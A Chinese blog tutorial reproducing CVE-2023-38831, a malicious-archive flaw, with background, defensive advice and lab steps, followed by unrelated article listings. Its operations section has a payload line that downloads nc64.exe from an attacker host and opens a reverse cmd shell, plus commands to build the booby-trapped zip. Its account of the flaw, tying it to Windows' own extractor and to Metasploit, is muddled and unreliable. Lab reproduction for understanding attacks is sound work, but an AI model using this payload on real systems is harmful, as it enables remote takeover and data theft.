CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析

目录

前言

漏洞介绍

漏洞原理

产生条件

影响范围

防御措施

复现步骤

环境准备

具体操作


前言

在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。

漏洞介绍

CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。当用户在 Windows 10 系统上解压这类特制压缩包时,恶意代码会在无需用户额外操作的情况下自动执行。这就如同打开了潘多拉魔盒,攻击者借此实现挂马攻击,全面控制用户计算机,肆意窃取敏感信息,甚至进行更恶劣的破坏活动。

漏洞原理

该漏洞的根源在于 Windows 10 系统解压程序的机制缺陷。当处理特定格式压缩包时,解压程序在解压路径和文件解析环节存在安全隐患。攻击者巧妙利用这一漏洞,在解压路径中植入恶意代码。一旦解压程序按照错误路径解析文件,恶意代码便会顺势执行,将系统控制权拱手让给攻击者,进而为后续的恶意操作大开方便之门。

产生条件

  1. 操作系统环境:漏洞主要针对未安装相关安全补丁的 Windows 10 系统。尽管不同版本的 Windows 10 受影响程度略有不同,但只要未修复此漏洞,就如同在网络世界中裸奔,随时面临被攻击的风险。
  2. 解压操作:用户解压包含恶意代码的特制压缩包是触发漏洞的关键。这类压缩包经过攻击者精心设计,充分利用系统解压程序的漏洞,确保恶意代码能在解压瞬间被激活。
  3. 解压软件:无论是 Windows 10 系统自带的解压程序,还是存在相同漏洞的第三方解压软件,都可能成为攻击者的突破口。例如一些常见的免费解压软件,若未及时更新修复漏洞,就极易沦为攻击目标。

影响范围

Windows 10 系统在全球范围内广泛应用,从个人用户的日常办公,到企业办公环境的运转,再到教育机构的教学场景,几乎无处不在。这意味着只要使用未打补丁的 Windows 10 系统解压恶意压缩包,大量计算机都将暴露在风险之下,面临被挂马、数据泄露、系统被控制等严重威胁,可能导致个人隐私泄露、企业商业机密被盗取、教育资料丢失等一系列严重后果。

防御措施

  1. 及时更新系统补丁:微软已针对 CVE - 2023 - 38831 漏洞发布安全补丁,用户务必尽快安装,可通过 Windows Update 自动更新功能,也可手动下载安装,确保系统安全性。
  2. 谨慎解压未知来源压缩包:对于来源不明的压缩包,尤其是从不可信网站、邮件或即时通讯工具接收的,切勿轻易解压。解压前,先使用可靠的杀毒软件进行全面扫描,确认安全后再操作。
  3. 使用安全的解压软件:优先选择知名、更新及时的解压软件,并定期更新软件版本。避免使用来源不明或已被曝光存在安全漏洞的解压软件。同时,部分解压软件提供安全解压模式,建议启用,以降低风险。

复现步骤

环境准备

  1. 虚拟机:准备一台安装 Windows 10 系统的虚拟机,并确保未安装 CVE - 2023 - 38831 漏洞补丁。可借助虚拟机软件,如 VMware Workstation 或 VirtualBox 来创建。
  2. 攻击机:选用一台安装 Kali Linux 系统的计算机作为攻击机。Kali Linux 作为专业的网络安全测试操作系统,集成了大量实用的漏洞利用工具。
  3. 漏洞利用工具:在 Kali Linux 中,借助 Metasploit 框架进行漏洞复现。Metasploit 是一款强大的开源安全漏洞检测与利用工具,拥有丰富的漏洞利用模块。

具体操作

unzip winrar漏洞攻击脚本.zip     #解压攻击脚本
cd winrar漏洞攻击脚本            #切换到攻击脚本目录下
python -m http.server           #生成一个代码目录
nc -lnvp 6666                   #开启监听端口
vim script.bat                  #进入攻击脚本目录编辑文件,设置ip地址和指定端口
curl http://10.0.0.103:8000/nc64.exe -O nc64.exe & nc64.exe 10.0.0.103 6666 -e cmd.exe -d & test.png
python make.py test.png script.bat bianlianghot.zip     #生成病毒压缩包
  1. 启动 Metasploit 框架:在 Kali Linux 系统终端中输入 “msfconsole” 命令,启动 Metasploit 框架。
  2. 上传攻击脚本并解压:将攻击脚本压缩包进行上传并解压,并生成一个代码目录
  3. 此时在开启一个shell设置监听端口:设置本地监听端口
  4. 进入攻击脚本目录编辑文件:进入攻击目录编辑文件设置ip地址和端口信息
  5. 生成病毒压缩包:再打开一个终端生成病毒压缩包
  6. 上传压缩包到目标靶机:将恶意的病毒压缩包上传到目标靶机
  7. 触发漏洞:在 Windows 10 虚拟机中找到传输过来的恶意压缩包,双击解压。解压过程中,攻击机的 Metasploit 框架会监听到来自虚拟机的连接请求,从而实现对 Windows 10 系统的远程控制。此时,可在攻击机上执行各种命令,如查看文件、窃取数据等,模拟攻击者的操作流程。

通过以上复现步骤,我们能直观感受到 CVE - 2023 - 38831 漏洞的巨大危害。在现实网络环境中,我们必须时刻保持警惕,严格落实各项防御措施,切实保障系统安全。如果你对网络安全领域感兴趣,欢迎持续关注相关内容,一同探索更多网络安全知识。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/8689.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

WPF进阶 | WPF 数据绑定进阶:绑定模式、转换器与验证

WPF进阶 | WPF 数据绑定进阶:绑定模式、转换器与验证 一、前言二、WPF 数据绑定基础回顾2.1 数据绑定的基本概念2.2 数据绑定的基本语法 三、绑定模式3.1 单向绑定(One - Way Binding)3.2 双向绑定(Two - Way Binding)…

Java Swing 基础组件详解 [论文投稿-第四届智能系统、通信与计算机网络]

大会官网:www.icisccn.net Java Swing 是一个功能强大的 GUI 工具包,提供了丰富的组件库用于构建跨平台的桌面应用程序。本文将详细讲解 Swing 的基础组件,包括其作用、使用方法以及示例代码,帮助你快速掌握 Swing 的核心知识。 一…

题解 信息学奥赛一本通/AcWing 1118 分成互质组 DFS C++

题目 传送门 AcWing 1118. 分成互质组 - AcWing题库https://www.acwing.com/problem/content/1120/https://www.acwing.com/problem/content/1120/https://www.acwing.com/problem/content/1120/https://www.acwing.com/problem/content/1120/https://www.acwing.com/proble…

论文阅读笔记:VMamba: Visual State Space Model

论文阅读笔记:VMamba: Visual State Space Model 1 背景2 创新点3 方法4 模块4.1 2D选择性扫描模块(SS2D)4.2 加速VMamba 5 效果5.1 和SOTA方法对比5.2 SS2D和自注意力5.3 有效感受野5.4 扫描模式 论文:https://arxiv.org/pdf/240…

技术总结:FPGA基于GTX+RIFFA架构实现多功能SDI视频转PCIE采集卡设计方案

目录 1、前言工程概述免责声明 3、详细设计方案设计框图SDI 输入设备Gv8601a 均衡器GTX 解串与串化SMPTE SD/HD/3G SDI IP核BT1120转RGBFDMA图像缓存RIFFA用户数据控制RIFFA架构详解Xilinx 7 Series Integrated Block for PCI ExpressRIFFA驱动及其安装QT上位机HDMI输出RGB转BT…

03:Heap代码的分析

Heap代码的分析 1、内存对齐2、Heap_1.c文件代码分析3、Heap_2.c文件代码分析4、Heap_4.c文件代码分析5、Heap_5.c文件代码分析 1、内存对齐 内存对齐的作用是为了CPU更快的读取数据。对齐存储与不对齐存储的情况如下: 计算机读取内存中的数据时是一组一组的读取的…

自动驾驶---苏箐对智驾产品的思考

1 前言 对于更高级别的自动驾驶,很多人都有不同的思考,方案也好,产品也罢。最近在圈内一位知名的自动驾驶专家苏箐发表了他自己对于自动驾驶未来的思考。 苏箐是地平线的副总裁兼首席架构师,同时也是高阶智能驾驶解决方案SuperDri…

Android BitmapShader简洁实现马赛克/高斯模糊(毛玻璃),Kotlin(三)

Android BitmapShader简洁实现马赛克/高斯模糊(毛玻璃),Kotlin(三) 发现,如果把(二) Android BitmapShader简洁实现马赛克,Kotlin(二)-CSDN博客 …

【数据结构】 并查集 + 路径压缩与按秩合并 python

目录 前言模板朴素实现路径压缩按秩合并按树高为秩按节点数为秩 总结 前言 并查集的基本实现通常使用森林来表示不同的集合,每个集合用一棵树表示,树的每个节点有一个指向其父节点的指针。 如果一个节点是它自己的父节点,那么它就是该集合的代…

【深度学习入门_机器学习理论】K近邻法(KNN)

本部分主要为机器学习理论入门_K近邻法(KNN),书籍参考 “ 统计学习方法(第二版)”。 学习目标: 了解k近邻算法的基本概念、原理、应用;熟悉k近邻算法重要影响要素;熟悉kd树原理与优化应用。 开始本算法之…

深入理解 SQL 中的子查询

文章目录 一、什么是子查询二、子查询的基本语法三、数据准备四、子查询的分类4.1 标量子查询4.2 单行子查询4.3 多行子查询4.4 关联子查询 五、子查询的应用场景5.1 子查询与 WHERE 子句5.2 子查询与 SELECT 子句5.3 子查询与 FROM 子句 六、性能优化与注意事项 本文将深入探讨…

Zookeeper入门部署(单点与集群)

本篇文章基于docker方式部署zookeeper集群,请先安装docker 目录 1. docker初期准备 2.启动zookeeper 2.1 单点部署 2.2 集群部署 3. Linux脚本实现快速切换启动关闭 1. docker初期准备 拉取zookeeper镜像 docker pull zookeeper:3.5.6 如果拉取时间过长&#xf…

【SpringBoot教程】Spring Boot + MySQL + HikariCP 连接池整合教程

🙋大家好!我是毛毛张! 🌈个人首页: 神马都会亿点点的毛毛张 在前面一篇文章中毛毛张介绍了SpringBoot中数据源与数据库连接池相关概念,今天毛毛张要分享的是关于SpringBoot整合HicariCP连接池相关知识点以及底层源码…

SCRM在企业私域流量与客户管理中的变革之路探索

内容概要 在当今数字化高速发展的时代,SCRM(社交客户关系管理)作为一种新的管理工具,正逐渐成为企业私域流量管理和客户关系维护的重要基石。它不仅仅是一种软件工具,更是一种整合客户数据和关系管理的全新思维方式。…

实战 | 域环境下通过anydesk进入生产网

视频教程在我主页简介或专栏里 目录: 前言 外网突破 资产扫描与常规漏洞 经典的MS17010漏洞利用: 网络通信设备弱口令: 安全防护设备集群: 域环境渗透 核心生产网渗透 总结 教程下载链接:zkanzz 话不多说&#x…

卡特兰数学习

1,概念 卡特兰数(英语:Catalan number),又称卡塔兰数,明安图数。是组合数学中一种常出现于各种计数问题中的数列。它在不同的计数问题中频繁出现。 2,公式 卡特兰数的递推公式为:f(…

算法刷题Day28:BM66 最长公共子串

题目链接,点击跳转 题目描述: 解题思路: 方法一:暴力枚举 遍历str1的每个字符x,并在str2中寻找以相同元素x为起始的最长字符串。记录最长的公共子串及其长度。 代码实现: def LCS(self, str1: str, st…

Open FPV VTX开源之ardupilot双OSD配置摄像头

Open FPV VTX开源之ardupilot双OSD配置 1 源由2. 分析3. 配置4. 解决办法5. 参考资料 1 源由 鉴于笔者这台Mark4 Copter已经具备一定的历史,目前机载了两个FPV摄像头: 模拟摄像头数字摄像头(OpenIPC) 测试场景: 从稳定性的角度&#xff1…

【Super Tilemap Editor使用详解】(十六):高级主题:深入理解 Super Tilemap Editor

在本节中,我们将深入探讨 Super Tilemap Editor 的工作原理,特别是图块地图(Tilemap)的渲染机制以及如何优化性能。这些知识将帮助你更好地理解工具的内部机制,并在开发中做出更明智的决策。 一、图块地图与图块渲染 图块地图是 Super Tilemap Editor 的核心组件之一。它由…